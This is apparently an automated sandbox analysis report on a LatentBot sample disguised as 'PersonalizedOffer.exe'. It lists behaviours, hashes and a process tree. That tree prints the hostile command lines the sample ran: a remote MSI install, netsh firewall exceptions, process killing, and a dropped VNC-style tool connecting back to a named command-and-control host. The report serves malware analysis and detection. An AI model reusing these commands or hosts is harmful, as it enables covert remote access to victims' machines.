Analysis

  • max time kernel
    298s
  • max time network
    299s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-09-2024 08:38

General

  • Target

    PersonalizedOffer.exe

  • Size

    3.9MB

  • MD5

    09e3aa460dbf9cddbb402354cb854ced

  • SHA1

    e27bf77f6cf806e1c841fc487872d9f5f75a75f7

  • SHA256

    99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b

  • SHA512

    5521bdd944d58a9cf524959598fac97f810090d2f934afdb00809a75c46c163e053b0d092f955805d0be150ecbb137c1814f92c5f1887bf45ad9ee17f67dfa6c

  • SSDEEP

    98304:7tlEb9+zykLmOCYNW/WrHwOnvE8sJXcMv5ezs2rEPqYxLI:7tSb9+zykLmxd/cHwOkp7jI

Malware Config

Extracted

Family

latentbot

C2

besthard2024.zapto.org

Signatures

  • LatentBot

    Modular trojan written in Delphi which has been in-the-wild since 2013.

  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 8 IoCs
  • Use of msiexec (install) with remote resource 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Windows directory 11 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 18 IoCs
  • Disables Windows logging functionality 2 TTPs

    Changes registry settings to disable Windows Event logging.

  • Kills process with taskkill 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\PersonalizedOffer.exe
    "C:\Users\Admin\AppData\Local\Temp\PersonalizedOffer.exe"
    1⤵
    • Checks computer location settings
    • Enumerates connected drives
    • System Location Discovery: System Language Discovery
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1244
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\system32\msiexec.exe" /i https://www.walteryhu.site/PrintViewer.msi AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\PersonalizedOffer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1727358523 "
      2⤵
      • Use of msiexec (install) with remote resource
      • Blocklisted process makes network request
      • Enumerates connected drives
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious use of FindShellTrayWindow
      PID:2336
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXE96E6.bat" "
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1520
      • C:\Windows\SysWOW64\attrib.exe
        C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\AIE7C35.tmp"
        3⤵
        • System Location Discovery: System Language Discovery
        • Views/modifies file attributes
        PID:2632
      • C:\Windows\SysWOW64\attrib.exe
        C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXE96E6.bat"
        3⤵
        • System Location Discovery: System Language Discovery
        • Views/modifies file attributes
        PID:2624
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXE96E6.bat" "
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4268
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" cls"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1760
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4980
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 8686D1DD78A936B5F808CFA8DAC87A13 C
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:4976
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 62CB3AC185A89FD90D6612E021FD3497
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:1364
    • C:\Windows\Installer\MSI961C.tmp
      "C:\Windows\Installer\MSI961C.tmp" /DontWait /HideWindow /dir "C:\Games\" "C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:3940
  • C:\Games\PrintDrivers.exe
    "C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd"
    1⤵
    • Executes dropped EXE
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    PID:1148
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Games\PrintDrivers.cmd" "
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:5008
    • C:\Windows\system32\mode.com
      Mode 90,20
      2⤵
        PID:4104
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
        2⤵
          PID:3372
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4720
          • C:\Windows\system32\reg.exe
            Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
            3⤵
              PID:1680
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic process where (name="PrintDriver.exe") get commandline
            2⤵
              PID:1320
            • C:\Windows\system32\findstr.exe
              findstr /i "PrintDriver.exe"
              2⤵
                PID:1988
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\PrintDriver.txt"
                2⤵
                  PID:4460
                • C:\Windows\system32\cmd.exe
                  cmd
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1288
                  • C:\Windows\system32\mode.com
                    Mode 90,20
                    3⤵
                      PID:5040
                    • C:\Windows\system32\netsh.exe
                      netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplication" mode=ENABLE scope=ALL
                      3⤵
                      • Modifies Windows Firewall
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:1884
                    • C:\Windows\system32\netsh.exe
                      netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
                      3⤵
                      • Modifies Windows Firewall
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:1600
                    • C:\Windows\System32\Wbem\WMIC.exe
                      wmic process where (name="PrintDriver.exe") get commandline
                      3⤵
                        PID:4616
                      • C:\Windows\system32\findstr.exe
                        findstr /i "PrintDriver.exe"
                        3⤵
                          PID:2988
                        • C:\Games\PrintDriver.exe
                          C:\Games\PrintDriver.exe -autoreconnect ID:5996338 -connect besthard2024.zapto.org:5500 -run
                          3⤵
                          • Executes dropped EXE
                          • Suspicious use of FindShellTrayWindow
                          • Suspicious use of SendNotifyMessage
                          PID:3296
                      • C:\Windows\system32\timeout.exe
                        timeout /t 1
                        2⤵
                        • Delays execution with timeout.exe
                        PID:860
                      • C:\Windows\system32\taskkill.exe
                        taskkill /im rundll32.exe /f
                        2⤵
                        • Kills process with taskkill
                        PID:2444
                      • C:\Windows\system32\timeout.exe
                        timeout /t 1
                        2⤵
                        • Delays execution with timeout.exe
                        PID:1108
                      • C:\Windows\system32\taskkill.exe
                        taskkill /im rundll32.exe /f
                        2⤵
                        • Kills process with taskkill
                        PID:2008
                      • C:\Windows\system32\timeout.exe
                        timeout /t 1
                        2⤵
                        • Delays execution with timeout.exe
                        PID:3972
                      • C:\Windows\system32\taskkill.exe
                        taskkill /im rundll32.exe /f
                        2⤵
                        • Kills process with taskkill
                        PID:3200
                      • C:\Games\PrintDrivers.exe
                        C:\Games\PrintDrivers.exe /HideWindow C:\Games\driverhelp.cmd
                        2⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:3252
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\Games\driverhelp.cmd" "
                      1⤵
                        PID:1548
                        • C:\Windows\system32\mode.com
                          Mode 90,20
                          2⤵
                            PID:3932
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
                            2⤵
                              PID:4204
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
                              2⤵
                                PID:820
                                • C:\Windows\system32\reg.exe
                                  Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
                                  3⤵
                                    PID:4344
                                • C:\Windows\system32\timeout.exe
                                  timeout /t 20
                                  2⤵
                                  • Delays execution with timeout.exe
                                  PID:4776
                                • C:\Windows\system32\timeout.exe
                                  timeout /t 20
                                  2⤵
                                  • Delays execution with timeout.exe
                                  PID:680
                                • C:\Windows\system32\timeout.exe
                                  timeout /t 20
                                  2⤵
                                  • Delays execution with timeout.exe
                                  PID:4900
                                • C:\Windows\system32\timeout.exe
                                  timeout /t 20
                                  2⤵
                                  • Delays execution with timeout.exe
                                  PID:3704
                                • C:\Windows\system32\timeout.exe
                                  timeout /t 20
                                  2⤵
                                  • Delays execution with timeout.exe
                                  PID:1416
                                • C:\Windows\system32\timeout.exe
                                  timeout /t 20
                                  2⤵
                                  • Delays execution with timeout.exe
                                  PID:4204
                                • C:\Windows\system32\timeout.exe
                                  timeout /t 20
                                  2⤵
                                  • Delays execution with timeout.exe
                                  PID:2904
                                • C:\Windows\system32\timeout.exe
                                  timeout /t 20
                                  2⤵
                                  • Delays execution with timeout.exe
                                  PID:3688
                                • C:\Windows\system32\timeout.exe
                                  timeout /t 20
                                  2⤵
                                  • Delays execution with timeout.exe
                                  PID:3212
                                • C:\Windows\system32\timeout.exe
                                  timeout /t 20
                                  2⤵
                                  • Delays execution with timeout.exe
                                  PID:1680
                                • C:\Windows\system32\timeout.exe
                                  timeout /t 20
                                  2⤵
                                  • Delays execution with timeout.exe
                                  PID:2680
                                • C:\Windows\system32\timeout.exe
                                  timeout /t 20
                                  2⤵
                                  • Delays execution with timeout.exe
                                  PID:5092
                                • C:\Windows\system32\timeout.exe
                                  timeout /t 20
                                  2⤵
                                  • Delays execution with timeout.exe
                                  PID:4452
                                • C:\Windows\system32\timeout.exe
                                  timeout /t 20
                                  2⤵
                                  • Delays execution with timeout.exe
                                  PID:3236
                                • C:\Windows\system32\timeout.exe
                                  timeout /t 20
                                  2⤵
                                  • Delays execution with timeout.exe
                                  PID:2880

                              Network

                              MITRE ATT&CK Enterprise v15

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • C:\Config.Msi\e57931a.rbs

                                Filesize

                                418KB

                                MD5

                                f7f2a9a5039e0e283b68da1af2f35ce4

                                SHA1

                                335d127e757c57a2b2f241546efd0ff4ab9fa0b5

                                SHA256

                                bd2fee431041c0fd3c3c6c753b7d2e7609895d77090e7bf1a1917b1546966482

                                SHA512

                                12e702b2b7b68f02b785f932b68666864071d85fbae4eb8da183fb5a52ee29feff5253660f452cf2d89c6a070885430b353b47b5bdc9d09346309496f92f078d

                              • C:\Games\PrintDriver.exe

                                Filesize

                                2.8MB

                                MD5

                                27c1c264c6fce4a5f44419f1783db8e0

                                SHA1

                                e071486e4dfef3a13f958a252d7000d3ce7bfd89

                                SHA256

                                29379afd1ca5439c82931d623fda335174dc416e5b013591457fa1f7bbe564db

                                SHA512

                                a80a512be6f152e8737cd5d0a0a2a193eaf88f3bfb7ed6b7695d227e195db278e2734ebfc9fe48a68cfb13e4e5bb7fb4825019cfa2210ba741ecf8b11f954a98

                              • C:\Games\PrintDriver.txt

                                Filesize

                                1KB

                                MD5

                                6eb13f7936a83f4c44842029914aad6e

                                SHA1

                                7b9b27731d4ca6f996ce68c5d68b4d653e31d915

                                SHA256

                                8d9bb49947d9dc7fa7be7310149a99f13a0c02580fd996aae31c69d673775c49

                                SHA512

                                227788193867b2f99a62ae792d91562ad46ea3fa0855cf6ef28fc0de31d43f2e671c6ef50e534f0235f1f663769715bef162913a554e86e581fe05455373623e

                              • C:\Games\PrintDrivers.cmd

                                Filesize

                                1KB

                                MD5

                                eacc690f71a77685f030bef23b506b91

                                SHA1

                                03b911ba997d44028bf515ea44fe4813b4b4a785

                                SHA256

                                0f1d30740f2e46b22b86fb01acdabbd02440d7dbebe963a405fb3a5661b23263

                                SHA512

                                9870aa4dc699b74bfc8fb53df0c74686913f42ea2321bee39786e5be696fb081e3dfdac1b312f3c439c14e3061f35cefe820ef1ac5c853274ca0c867bf50a54d

                              • C:\Games\PrintDrivers.exe

                                Filesize

                                403KB

                                MD5

                                29ed7d64ce8003c0139cccb04d9af7f0

                                SHA1

                                8172071a639681934d3dc77189eb88a04c8bcfac

                                SHA256

                                e48aac5148b261371c714b9e00268809832e4f82d23748e44f5cfbbf20ca3d3f

                                SHA512

                                4bdd4bf57eaf0c9914e483e160182db7f2581b0e2adc133885bf0f364123d849d247d3f077a58d930e80502a7f27f1457f7e2502d466aec80a4fbeebd0b59415

                              • C:\Games\UltraVNC.ini

                                Filesize

                                1KB

                                MD5

                                b9dfbea744cc6c65473a97f2b959e44c

                                SHA1

                                c022f1d97fa56d61ad935aafa4e9e59e611e746a

                                SHA256

                                6f95a4eff9b0c2eaf37104b323d2b09c037aa7c3d472a1887c0f7914aa6c835d

                                SHA512

                                b92c8ea3583eb87f365b96cd45562cac2c4343e281c5090fc00db3f03bb5538a2d8aea3c39449d8d79cad31ed3692f6045266811d50fdd69807d8b12a9649eb5

                              • C:\Games\driverhelp.cmd

                                Filesize

                                870B

                                MD5

                                fd3b5847ddb8a31413951c0aa870ab95

                                SHA1

                                e3e91e3e9fa442cd1937422120de91da87973ddb

                                SHA256

                                e4f5e16dfe9bbe6d63f266103c35c0035a2d4014f516420190b7cfafb02b08ad

                                SHA512

                                5d8599f7d6f0824ab30118f5680bf89d28c1e7e9de4ed61af9074cb9d339619d59dab8e5818dc93dcf5b27ad9e8a863c5d082f8f829aa8c4a026ec5da2454096

                              • C:\Users\Admin\AppData\Local\Temp\AIE7C35.tmp

                                Filesize

                                6.7MB

                                MD5

                                85f914ec316e8d20e8e13ef3719e04e4

                                SHA1

                                86ec276d409525bd8c1ef6d47ec8eece7639c0a2

                                SHA256

                                00ceea629efd7eb1d9eee5706ce8089336259c099fc4af274baf857bd1ddf230

                                SHA512

                                6a9eebfd6b4e794ab1fd949fa2093559460390a1d7843484e2086145e2ae968d8c347a3b3392aab2ebc41463cf97a3d36b23b6e8f80000949bb66c8eff3ba4e6

                              • C:\Users\Admin\AppData\Local\Temp\EXE96E6.bat

                                Filesize

                                369B

                                MD5

                                6785b18183d9be9f5afb018c100b0944

                                SHA1

                                5993550f26f63eb5dd24f1577f1afc1d85b67ee9

                                SHA256

                                eb369209c738e530858855b87cfbb002f8333b77fc5ec04672ee8ce0af65a3bf

                                SHA512

                                0ba4130ee794a7b9eab95b413ee10680bdfe3b8efe2d219459fbb5f6c2c4cfd99a4f9b84a54a0779b107c547e4371c93ce17cb22669e1fc417b1efb586ce472d

                              • C:\Users\Admin\AppData\Local\Temp\MSI85BC.tmp

                                Filesize

                                936KB

                                MD5

                                13056f6fc48a93c1268d690e554f4571

                                SHA1

                                b83de3638e8551a315bb51703762a9820a7e0688

                                SHA256

                                aeda49baf2d79da2f7a9266f1fb7884111c2620e187090321f5278af5131c996

                                SHA512

                                ca828b4248e399178a8614f941332d159a30bad0156df0d5f4c4ca9d74d0ccb61fac59f34c945f5f914e22ec639bd97718f76d21b452825b07fe4041d1a44824

                              • C:\Windows\Installer\MSI961C.tmp

                                Filesize

                                413KB

                                MD5

                                c8311ded7db427ce2c2879558ce8a8c1

                                SHA1

                                1895ce48297025dc005ebebc8256ac6d62013dec

                                SHA256

                                6fc76509f00c8ac81b597feeab520e684d190d831d828ca318d1e54afbf4a193

                                SHA512

                                d293885ef98f4e3fd9794500b8d560354cec3227916df05027f8c311076c60f11b6857e4e0ab0618f4d42da8141b42bcfb829a3a43b29a73ce0aa9967a80a232